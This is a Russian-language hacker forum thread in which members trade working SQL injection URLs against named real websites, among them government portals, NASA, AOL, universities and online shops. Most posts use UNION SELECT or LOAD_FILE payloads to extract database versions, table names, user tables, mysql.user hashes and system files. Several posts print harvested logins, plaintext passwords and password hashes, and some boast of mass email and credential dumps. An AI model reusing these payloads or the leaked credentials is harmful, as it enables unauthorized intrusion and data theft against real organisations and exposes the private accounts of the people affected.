короткий домен :D::DD

http://www.animalfarmfoundation.org/topic.php?id=21&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

и ышо

http://www.blackpoolpleasurebeach.com/ride.php?rideType=3&id=-1+union+select+1,2,3,4,5,6,7,8/*

http://www.mbreview.com/article.php?sid=-9+union+select+1,2,3,convert(version()+using+latin 1),5,6,7,8,9
=\ не копался

http://www.feldgrau.com/PzDiv.php?ID=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*

чёто про войну.. даты есть 1941-1945


http://www.toumaz.com/news/news.php?id=-117+UNION+SELECT+1,2,3,4,5,6/*

какойто электронный кластырь

http://www.7info.ru/index.php?kn=-517+UNION+SELECT+1,2,3,4,5,6/*
Рязанское агенство 7 новостей

http://www.backporchrevolution.com/release.php?id=21+order+by+1/*
оророр

America On-Line
http://ted.aol.com/index.php?ID=-20+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
http://ability.aol.com/ability/index.php?ID=2&catID=-2+union+select+1,convert(version()+using+latin1)/*
http://nhldraftnet.aol.com/NHLDraftNet/index.php?ID=-20+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

лдлддллд

http://www.jonnyguru.com/review_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://genproc.gov.ru/ru/news/index.shtml?id=5694'
Сайт ген прокуратуры

5-я версия, все очевидно
http://www.ibmhursleyclub.org.uk/news/news.shtml?id=-120+union+select+1,concat(table_schema,char(58),TA BLE_NAME),3,4+from+INFORMATION_SCHEMA.TABLES+limit +1,10/*

http://english.minsvyaz.ru/news.shtml?id=1&news_id=-36+union+select+1,concat_ws(char(58),user(),databa se(),version()),3/*

Сайт ген прокуратуры

http://genproc.gov.ru/ru/news/index.shtml?id=5694+and+5694=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16/*
к mysql.user доступ закрыт =\

www.promtractor.ru

Трахторской заводег

http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*

http://loveradio.ru/ru/vote.shtml?vote_question_id=27%20AND%201=0
http://loveradio.ru/ru/vote.shtml?vote_question_id=27'
http://loveradio.ru/ru/main/forum/forum.shtml?fid=5'
http://loveradio.ru/ru/main/forum/forum.shtml?fid=5%20and%201=0
http://loveradio.ru/ru/main/horoscope/index.shtml?sign=aries'

http://www.ecruins.com/bands.php?ID=21+order+by+1

www.c82.net

http://www.c82.net/article.php?ID=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4/*

нашол инэекцыю на
http://www.eightrent.co.jp/shop/?id=-18+ORDER+BY+7--
подобрал столбец, а когда делаю
http://www.eightrent.co.jp/shop/?id=-18+UNION+SELECT+1,2,3,4,5,6,7
ошыбка....(

вавава

http://www.eppenga.com/folder.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

нашол инэекцыю на
http://www.eightrent.co.jp/shop/?id=-18+ORDER+BY+7--
подобрал столбец, а когда делаю
http://www.eightrent.co.jp/shop/?id=-18+UNION+SELECT+1,2,3,4,5,6,7
ошыбка....(

уже говорил тебе - что когда применяеш order by ненужно ставить несуществующий id

www.know-house.ru

http://www.know-house.ru/card_firm.php?n_id=102'+union+select+1,2,user(),4, 5,6,7+user/*

немогу подобрать таблици =(

http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

http://5mag.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,concat(email,char(58),p wd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28+from+users+limit+1,1/*

Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))

Snap >>
http://privet.zp.ua/part4.php3?catid=1'

мож здесь найдьош!)))
думаешь, скрипты разные базы юзают? о_0
ps: automatization.ru
http://www.automatization.ru/equip-db/device.php?id=-1+union+select+1,2,3,4,5,concat(login,0x3a,passwor d),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+fr om+user+limit+0,1/*

vechirka.kiev.ua

http://vechirka.kiev.ua/article.php?id_article=-1+union+select+1,concat(user(),char(58),database() ,char(58),version()),3,4+user/*

http://wc2006.sport.com.ua/teams.phtml?id_team=-6+union+select+concat(password,0x3a,username)+from +users/*

База то одна только вот занвание таблиц подобрать не могу
http://privet.zp.ua/anketa.php3?part=1&id=-4708+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23/*

Поэтому толку нет мне кажеться из других мест биться

n1†R0x здесь маса вареантов он титулкы на главной до названия самого файла где призошла ошыбка... я имел виду в том что может быть какаято зацепка..) с всего етого

www.02.ru

Правоохранительный Портал

http://www.02.ru/news/index.php?id_tn=-1
http://www.02.ru/news/index.php?id_tn=8&id_n=668-1
http://www.02.ru/news/index.php?id_tn=8&id_n=667'

Ксандер
http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
просто вывода нет =)

Ксандер
http://www.02.ru/news/index.php?id_tn=-2+union+select+1,2/*
просто вывода нет =)


Тоже это заметил, но думал это у меня глюкануло, значит нет=), даже конверт пробовал =))



p.s. в процесеhttp://www.soaw.org/new/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

[shop]
http://www.loversandfriends.nl/shop.php?id=-56+union+select+1,2,3,user(),database(),6,7,8,9,ve rsion(),11,12,13,14,15,16/*
http://www.webdesign-freelance.nl/webdesign-freelance-shop.php?id=-15%20UNION%20SELECT%201,convert(user()+using+latin 1),3,4,convert(version()+using+latin1)/*

наверное Айсег постил уже
NASA
http://www.ueet.nasa.gov/toi/viewtoi.php?id=-8+union+select+1,2,3,4,table_name,6,7,8+from+infor mation_schema.tables+limit+16,1

www.soaw.org

Не выводит.
http://www.soaw.org/new/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65/*

Ксандер, ты просто перебираешь что ли? 0_о
union select 1
union select 1,2
union select 1,2,3
Если да то загляни в мою статью, там про подбор колонок =)

meteoprog.com.ua

Погоду хотел узнать =)

http://meteoprog.com.ua/gorodMira.php?cityid=-1+union+select+1/*

http://www.worstpreviews.com/review.php?id=17+order+by+1


http://www.ragmag.net/page.php?id=21+order+by+15

юнион селект пименять лень...

ekat.ru
http://ekat.ru/firms/index.php/job/?cmd=show&rubid=-1+union+select+email,2+from+users+limit+1,19000/*
почти 18.5к мыльников :)
можно еще выдернуть логины/пассы к мылам.. для пассов столбец password :)

www.hansbekxteamsport.nl[shop]
http://www.hansbekxteamsport.nl/2007/shop.php?ID=-6+union+select+1,2,3,password,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19+from+Users/*
http://www.hansbekxteamsport.nl/2007/shop.php?ID=-6+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+INFORMATION_SCHEMA.TABL ES+limit+31,1/*

pass-в чистом виде

http://www.urlopwpolsce.pl/kategoria.php?id=17+order+by+2/*

infoprom.com.ua

http://infoprom.com.ua/catalog.php?lang=ru&id=-1+union+select+concat(version(),char(58),database( ),char(58),user())/*

http://www.counterstrike-files.com/CSS/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33/*
дальше не подбирал ....инет полудохлый=\

www.promdesign.com.ua

http://www.promdesign.com.ua/search.html?s=-1+union+select+1,2,3,4,name,6,7+from+t_forum/*

http://www.flirtanica.ru/articles1.php?id=18%20union%20select%201,2,3,4,5/*

http://www.breakdance.ru/index.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*

camaracaxias.rs.gov.br
http://www.camaracaxias.rs.gov.br/imprensatextoimp.php?ID=-1193%20UNION%20SELECT%201,convert(user+using+latin 1),convert(password+using+latin1),4,5,6,7,8,9,10,1 1+from+mysql.user/*

paxar.bc.ca

Ничего интересного нема.
http://paxar.bc.ca/viewnews.php?newsID=-1+union+select+1,2,concat(username,char(58),passwo rd),4+from+administrators/*

http://www.terrorism.ru/dosie1.phtml?id=18%20union%20select%201,2,3,4,5%20 from%20mysql.user/*

результат в самом низу страницы

thelist.ru
http://thelist.ru/link.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+information_schema.tabl es+limit+40,1/*
+ там еще много таблиц... можете покопаться :)


update:
bestposters.ru
http://www.bestposters.ru/main.php?big=-1+union+select+1,concat(login,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15+from+users+limit+0,1/*
шоп, логины/пассы в чистом виде, перебор лимита решает..
http://www.bestposters.ru/login_user.php?action=lform
логин

http://www.rehmonnya.org/allwcrp_detail.php?id=17+order+by+10

и ещё короткий домен :)))

http://www.hermitagehelmond.com/kluizen2.php?id=17+order+by+4

www.nasheradio.net


http://www.nasheradio.net/news2.php?id=1'+union+select+1,concat(user(),char( 58),database(),char(58),version()),3,4,5,6,7,8,9,1 0,11,12/*

http://www.quest3d.com/index.php?id=17+order+by+17

geia.org.br/shop
http://geia.org.br/shop/detalhe.php?id=-197+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limi t+35,1/*

какой-то банк
http://www.tsb.kz/info.php?id=180%20union%20select%201,version(),dat abase(),4,5,user(),7,8/*

http://www.urlopwpolsce.pl/kategoria.php?id=17+order+by+2/*

www.Reflex.Se

http://www.reflex.se/news.php?ID=-1+union+select+1,concat(username,char(58),password ),3,4,5,6,7+from+users/*

http://www.eletrofar.com.br/shop/compra.php?id=-40%20UNION%20SELECT%201,2,version(),4,5,6/*

http://www.norden.ee/indexee.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*

от \6/
http://www.norden.ee/indexee.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/*
а где ннъекция?

эээ вот тут была :)
http://www.norden.ee/indexee.php?ID=17,23+order+by+16

http://www.edu.upplands-bro.se/ubg/index.php?id=-214+union+select+1,user_name,user_password,4+from+ admin/*
name:Super Admin
password:huggan

http://www.tvdata.ru/catalog.php?dir=-2+union+select+1,2,3,4,5,load_file('/home/www/htdocs/admin/.htpasswd'),7,8,9,10,11,12/*

http://www.offroad.ru/gallery/gal_picshow.php?g_id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1,1,1,1,1,1/*???

http://2pay.ru/geo/?id=0&st=0&a=2&town=1'
помогите ченить сделать дальше =)

http://christdot.org/modules.php?name=News&file=article&sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
дальше лень :D
в поиске ксс

avo.ru
Администрация Владимирской области
http://www.avo.ru/content.php?menu=1603&page_id=147+and+147=-1+union+select+1,concat(user,0x3a,password)+from+m ysql.user/*
root:7bf340b309e53784

ipm.cz
http://www.ipm.cz/group/index.php?group=-1+union+select+1,2,3,4,5,6,concat(user,0x3a,passwo rd),8,9+from+mysql.user+limit+1,1/*
milada:5d6f92636d33cb3d

пароли в mysql4-hash


///извините за 2 поста подряд, редакт. не работает почему-то..

MP3Db.ru
http://mp3db.ru/index.php?cid=8&subcid=-1+union+select+1,login,passwd,4,5,6,7,8,9,10,11,12 +from+users/*
пароли в md5

http://gp.by/index.php?mode=cat&cat_id=-216%20union%20select%201,id,3,4,5,concat_ws(char(5 8),name,email,login,pwd),7%20from%20admin/*

http://gp.by/admin

http://belarus21.by/gazeta/article_browse.php?id=354'
Ошибка понравилась очень :)
http://belarus21.by/main/news_browse.php?id=-4794%20union%20select%201,id,concat_ws(char(58),na me,email,login,pwd),4,5%20from%20admin/*

http://belarus21.by/admin

А с этим можно что-нить сделать? Union не идет.
http://www.worldwidedvdforums.com/kb.php?mode=cat&cat=71%20order%20by%206/*

МИНИСТЕРСТВО ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И СВЯЗИ РОССИЙСКОЙ Федерации

http://english.minsvyaz.ru/news.shtml?id=-1+UNION+SELECT+VERSION()/*&news_id=36

http://valiza.com.ua/opinions.php?id=-1+union+select+1,2,concat(username,char(58),email, char(58),password),4,5,6,7+from+phorum_users/*

http://forum.filippoff.ru/theme.php?id=-58+union+select+1,2,concat(login,char(58)pass),4,5 ,6,7,8,910,11,12+from+users+limit+0,1/*

Пасс в чистом виде=)

roman:331133

http://filippoff.ru/page.php?id=-12+union+select+1,concat(login,char(58),pass),3+fr om+user/*


http://www.montech.ru/index.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.fischer-fix.ru/index.php?id=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.lightpro.ru/news/detail.php?id_news=-3
http://www.chelkomp.ru/description.php?id=00000000046&grp=-1

http://www.jgts.net/post.php?id=-477+ORDER+BY+10/*

http://www.barcode.shark.ru/page.php?id=180%20union%20select%201,2,password,4, 5,6,7,8,9,10%20from%20mysql.user/*

http://ventorg.ru/index.php?id=180%20union%20select%201/*

http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*

Вывод в title'е:

http://www.rosmed.ru/news.php?act=by_id&news_id=-1+union+select+convert(concat(comp_domain,char(58) ,comp_user_fio,char(58),comp_user_mail,char(58),co mp_user_pass,char(58),comp_addr_phone),char),2+fro m+comp/*

http://english.dvb.no/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*

www.tal-shop.se
http://www.tal-shop.se/index.php?id=5&cid=-38+union+select+concat(passwd,0x3a,id_user,0x3a)+f rom+users/* http://www.spinter.net/page.php?id=-22+union+select+version(),user()/* http://www.gmstz.edu.ba/vijesti.php?id=-64+union+select+1,database(),3,4,5/*

Даже char() не потребовался, как знали =))
http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,2,user(),database(),version(),6, 7,8,9+from+users/*

Это ответ недавнему "великому" взлому удава... 3 действия)

http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,12 ,13,14+from+INFORMATION_SCHEMA.TABLES/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,6,COLUMN_NAME,8,9,10,11,1 2,13,14+from+INFORMATION_SCHEMA.COLUMNS/*
http://www.www.account.spb.ru/?Cat=regadms&Mod=view&ID=-2+union+select+1,2,3,4,5,id,concat_ws(char(58),FIO ,Login,PasWD),8,9,10,11,12,13,14+from+accounts/*

centresh.ru
http://www.centresh.ru/article.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(use r(),0x71),0x71),6,7/*

колонку с паролем не смог найти -
http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,3,4,5,username,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25+from+user+li mit+2000,2001

http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user(),char(64),version(), char(64),database())

http://www.polirem.ua/polyukr/news.phtml?id=-16+union+select+concat_ws(char(58),user(),database (),version())/*
симпотишная =\
http://www.skitours.com.ua/news.phtml?id=-13763+union+select+1,concat(version(),char(58),use r()),password,id,database(),6,7,8,9,10,11+from+use rs/*

http://www.kharkov-sport.com/news.phtml?id=-1326+union+select+1,2,database(),version(),5,6,7,8 ,9,10,user()/*&print=yes

www.rootkitshield.com
http://www.rootkitshield.com/links/dead.php?id=-8+union+select+1,2,3,4,version(),6,7,8,9/*

www.mashinki.ru
http://www.mashinki.ru/news.shtml?id=-93+UNION+SELECT+1,2,3,4,5,6,7,8/*

to InferNo23
колонку с паролем не смог найти -
http://www.expat.ru/restaurantreviews.php?cid=-1+union+select+1,2,concat(password,0x3a,username), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25+from+user/*
8fb8b4736f9f74bb1d301491e1798b08:Martin

http://www.massagan.com/news.php?mod=news&catid=1&id=-540+union+select+1,concat(user(),0x3a,version(),0x 3a,database()),password,4,5,6,name,8+from+users/*

www.proformula.ua
http://www.proformula.ua/news.phtml?id=-9174+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
www.gostudy.com.ua
http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,user(),3,4,5,6,7,8,9/*

http://www.archdiocese.la/podcasts/detail.php?id=-30%20UNION%20SELECT%201,username,password,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18+from+users/*

http://www.dozka.ru/start.php?main=gallery&act=image&image=-1+union+select+1,2,3,password,5,6,7,8+from+forum+l imit+0,10/*

http://www.orel-news.ru/index.php?main=showorelnews&id=-1+union+select+1,2,3,4,version(),6,7,8,9/*


http://www.psyedu.ru/rub.php?tema=-1+union+select+1,concat(id,0x7c2d2d7c,password,0x7 c2d2d7c,email),3+from+users/*

http://bestposters.ru/main.php?big=-1+union+select+1,2,email,4,5,login,7,password,9,10 ,11,12,13,14,15+from+users+limit+3,1/* (Прямо на мыло и в асю )

http://www.farma-96.ru/index.php?main=catalogue&object=round&round_ID=-1+union+select+1,2,3,4,name,6,7,pass,9,10+from+use rs+limit+2,1/*

http://www.openmic.ru/song_info.php?songid=-1+union+select+1,2,3,4,user(),6,7,8/*


http://www.bis077.ru/main.php?action=catalog_body&item=catalog_firm&id=-1+union+select+1,2,3333333,4,5+from+users/*

http://www.liverpoolfc.ru/news.php?id=-861+union+select+1,u.*+from+users+u/*

http://www.mcmenamins.com/index.php?loc=3+and+1=999+union+select+1,2,3,4,5,6 ,concat(user,0x3a,password),8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.use r+limit+0,1/*
root:07323b9e7d2a8d4f

http://www.unirc.it/comunicazione/all_news.php?task=view&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,0x3a,password),0x00),0x00),3,4,5,6,7,8,9,10,11, 12,13,14,15,16+from+mysql.user+limit+3,1/*
admin:0e67f9402e61771f == rowing
root:46d9bd420a1edee2

;)

http://www.adams-motors.ru/new.php?id=-1+union+select+11,2,222/*

www.da.wvu.edu
http://www.da.wvu.edu/XMLParser/printstory.phtml?id=-22813+union+select+1,2,user(),4,5,6,7,8,9,10,11/*

http://bl4u.ru/stat.php?id=-1+union+select+1,2,version(),4,5,6/*

___

http://present-link.info/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21/*

http://www.top100.vrn.ru/stat.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21/*

p.s. Во всех скриптах этого каталога sql инъекция... :)

http://webwarper.net/ru/www.nskfei.ru/girl.php?ids=-52+union+select+1,2,3,4,5,6,7,8/*

http://www.spb-mebel.ru/show_firm.php?id_firm=-171+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://www.pobeda.info/index.php?module=subjects&func=viewpage&pageid=-1+union+select+1,2,3,4,concat(pn_uname,0x3a,pn_pas s,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15,16,17+f rom+nuke_users+limit+1,1/*

http://hike.ru/index.php?module=subjects&func=viewpage&pageid=1+union+select+1,2,3,4,concat(pn_uname,0x3a ,pn_pass,0x3a,pn_email),6,7,8,9,10,11,12,13,14,15, 16,17+from+nuke_users+limit+2,1/*

http://www.jordandistrict.org/policymanual/p.php?id=-26+union+select+1,2,3,4,5/*

http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,3/*

http://www.swiss-music-export.com/p.php?ID=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*

http://date.bignepal.com/p.php?id=-1290+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18/*

http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,3/*


http://it.byuh.edu/P%20&%20S/p.php?id=-21+union+select+1,2,password+from+mysql.user/*

www.lenpravda.ru
http://www.lenpravda.ru/gate.phtml?id=-1921+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17/*

www.lenpravda.ru
http://www.lenpravda.ru/gate.phtml?id=-1921+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17/*


http://www.lenpravda.ru/gate.phtml?id=-1921+union+select+1,2,3,convert(user_pass,char),5, 6,7,8,9,10,11,12,13,14,15,16,17+from+users/*

http://www.atalaia.org/encontro.php?id=-149+union+select+1,2,3,version(),5/*
http://www.ibict.br/noticia.php?id=-176+union+select+user,convert(password+using+latin 1)+from+mysql.user/*
http://www.brasil.agenciapulsar.org/nota.php?id=-1511+union+select+1,2,3,4,5,6,7,8,9,10,user(),12/*

http://www.cooleysanemia.org/sections.php?sec=1+union+select+1,concat(username, 0x3a,user_password),3,4+from+users/*

http://www.vendeta.ru/comm.php?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6+from+users/*

http://www.allvideo.ru/detail.php3?id=-1+union+select+1,concat(database(),char(58),user() ,char(58),version())/*

sana.gov.kz



http://sana.gov.kz/index.php?lang=rus&id_open_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50...

http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(database(),cha r(58),user(),char(58),version()),char),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

2 Grey

http://www.kadis.ru/daily/index.html?id=-1+union+select+1,2,3,convert(concat(user,0x3a,pass word),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24+from+mysql.user/*
root:7312874647bb7446

И мое:
http://mobilefood.ru/show_cat.php?catid=-1+union+select+concat(username,0x3a,passwd)+from+u ser+limit+0,1/*
пассы немного странные, аналогичны ФИО-полю.. но как ни странно, подходят..
в базе адрес, телефон, заказы.. в общем, обычный интернет-шоп)
http://www.domsigar.ru/item.php?entry=1579+and+5=1+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
тут не подбирал )

http://www.legion-club.ru/news.php?id=-6+union+select+version(),2/*

http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,version(),3,4,5/*

http://www.keckobservatory.org/article.php?id=-103+union+select+1,convert(concat_ws(char(58),user (),version(),database())+using+latin1),3,4,5,6,7,8 +from+mysql.user/*

http://director-online.com/buildArticle.php?id=-1154+union+select+1,2,3,4,5,convert(concat(user_pa ssword,char(58),user_name)+using+latin1),7,8+from+ user/*

Чтобы убедиться в работоспособности этой скули вам придеться дожаться пока страница загрузиться, потом прокрутить всю страничку доконца,
и только после этого увидеть информацию, короче изврат. минус подставить даже не пытайтесь))
http://sistem.gemtech.fr/cours.php?Id=2+union+select+1,2,convert(concat_ws( char(58),version(),user(),database())+using+latin1 ),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

http://www.terrabike.com/shop/shop_faqs.php?id=-1+union+select+table_name,2+from+INFORMATION_SCHEM A.TABLES+limit+37,1/*

http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58), password),7,8,9+from+vb_user/*

Зарегано 24757 пользователей на форуме)))

________
http://www.marotori.com/bestwebdevelopmentanddesign.php?id=-1+union+select+1,2+from+mysql.user/*

http://www.activeserverpages.ru/faq/default.asp?mode=view&id=1+or+1=@@version--
перебираем через not in ;)

http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-30%20UNION%20SELECT%201,2,3,4,LOAD_FILE(0x2f657463 2f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24/*

http://www.bullchart.de/beitrag.php?id=-1+union+select+1,2,3,4,5,concat(username,char(58), password),7,8,9+from+vb_user/*

Зарегано 24757 пользователей на форуме)))



ты не заметил что форум хостится в другом месте, и эта таблицу к форуму отношения не имеет. :)

http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( user,0x3a,password),0x00),0x00),4+from+mysql.user/*
http://www.4site.ru/faq/index.shtml?th=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737 764),4/*

gov.tr :D

http://afyonozelidare.gov.tr/karar.asp?id=-1%20union%20select%200,sifre,kulladi,3%20from%20ad min

User:afyonozelidare
Pass:afyon03

Panel:/admin

VamShop.ru
http://vamshop.ru/support/modules/wflinks/viewcat.php?cid=5+union+select+1,2,concat(convert( membername+using+cp1251),0x3a,convert(passwd+using +cp1251),0x3a,convert(passwordsalt+using+cp1251)), 4,5,6,7,8,9,10,11,12,13,14+from+smf_members/*
логин:хеш:соль

http://www.voex.com/news/newsandarticles_article.php?DID=-1+union+select+1,version(),3,user(),5,6,7,database (),9,10,11,12,13,14,15/*

http://www.sobesednik.ru/news.php?id=3&art_id=-183)+union+select+1,2,3,4,5,convert(user()+using+c p1251),convert(version()+using+cp1251),8/*

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+version(),2/*
http://metalistfans.net/news.php?id=-607+union+select+1,2,3,version(),user(),database() ,7,8,9/*

http://www.themanroom.com/interviews.php?id=-10+union+select+1,2,3,4,5/*

http://oculus.ru/stat.php?id=-161+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.lanit.uz/stat.php?id=-7+union+select+1,2,3,4/*

http://pup.phpwebhosting.com/~atalaia/encontro.php?id=-81+union+select+1,2,3,4,5/*

http://www.diariosigloxxi.com/noticia.php?id=-11074+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17/*

http://www.agenciapulsar.org/nota.php?id=-9771+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.datafull.com/infotech/nota.php?id=-1398+union+select+1,2,3,4,5,6,7,8/*

http://www.mexicoforestal.gob.mx/nota.php?id=-379+union+select+1,2,3/*

http://www.cymrux.org.uk/docs/item.php?lg=en&item_id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21/*

http://www.spress.info/articles/articles1.php?id=9&cont=-10+union+select+1,2,3,4,5,6,7,8,9/*

http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-114+union+select+1,concat(id,0x3a,email),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17+from+members+limit+10 0000,1/*

http://www.corecoach.net/news/newsandarticles_article.php?DID=-3+union+select+1,concat(user,0x3a,password),3,4,5, 6,7,8,9,10,11,12,13,14,15+from+mysql.user/*

http://photo-masters.net/news.php?code=-86+union+select+1,2,3,4,5,6,version(),8,user(),10, 11,12,13/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),database(),5,6/*
http://www.igray.ru/news.php?sid=-3507+union+select+version()/*
http://www.rossignol.ru/ski/news.php?news_id=-41+union+select+1,version(),user(),4,database(),6, 7,8/*

http://www.yogainstitute.org/product_detail.php?id=-46%20UNION%20SELECT%201,2,3,concat(user(),0x3a,ver sion()),5,6/*

http://www.propovednik.ru/news.php?view=-652+union+select+1,2,3,4,5,6,7,8/*
http://transport.su/news.php?rub=5&id=-20792+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.yurcom.ru/news.php?news=-72+union+select+1,2,3,4/*
http://www.survival-international.org/news.php?id=-2128+union+select+1,2,3,4,database(),6,concat(user (),0x3a,version()),8,9,10,11,12,13,14,15,16,17,18/*

http://www.good.ru/events/evtall.php3?ob=-1+union+select+1,2,concat(convert(user+using+cp125 1),0x3a,convert(password+using+cp1251)),4,5,6,7,8, 9+from+mysql.user/*
http://oscommerce.su/modules/wflinks/viewcat.php?cid=-1+union+select+1,2,convert(version()+using+cp1251) ,4,5,6,7,8,9,10,11,12,13,14/*
http://www.konditerprom.ru/list/list.php?cid=-1+union+select+1,2,user(),4,5/*

http://uptime.ru/downtime.php?host_id=-1+UNION+SELECT+null,null,version(),null,null,null, null,null,null,null,null,null

Мой первый скуль :) Можете поздравить! Стукните в приват, спецы скуля. Есть вопросы к вам. ;)

http://uptime.ru/downtime.php?host_id=-1+UNION+SELECT+null,null,version(),null,null,null, null,null,null,null,null,null

Мой первый скуль :) Можете поздравить! Стукните в приват, спецы скуля. Есть вопросы к вам. ;)
я уже выкладывал
http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,icq,8,9, 10,11,12+from+users+limit+8200,8201/*
8к юзеров.

http://www.faithfulamerica.org/article.php?id=98%20union%20select%201,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9/*

http://www.ligali.org/review.php?id=-31%20UNION%20SELECT%201,2,version(),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62/*
5 версия, но при попытке сделать from+information_schema.tables выдает ошибку :(

http://www.cahiersdufoot.net/article.php?id=-2391%20union%20select%201,2,3,id,concat(login,char (58),email,char(58),password),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20%20from%20members/*
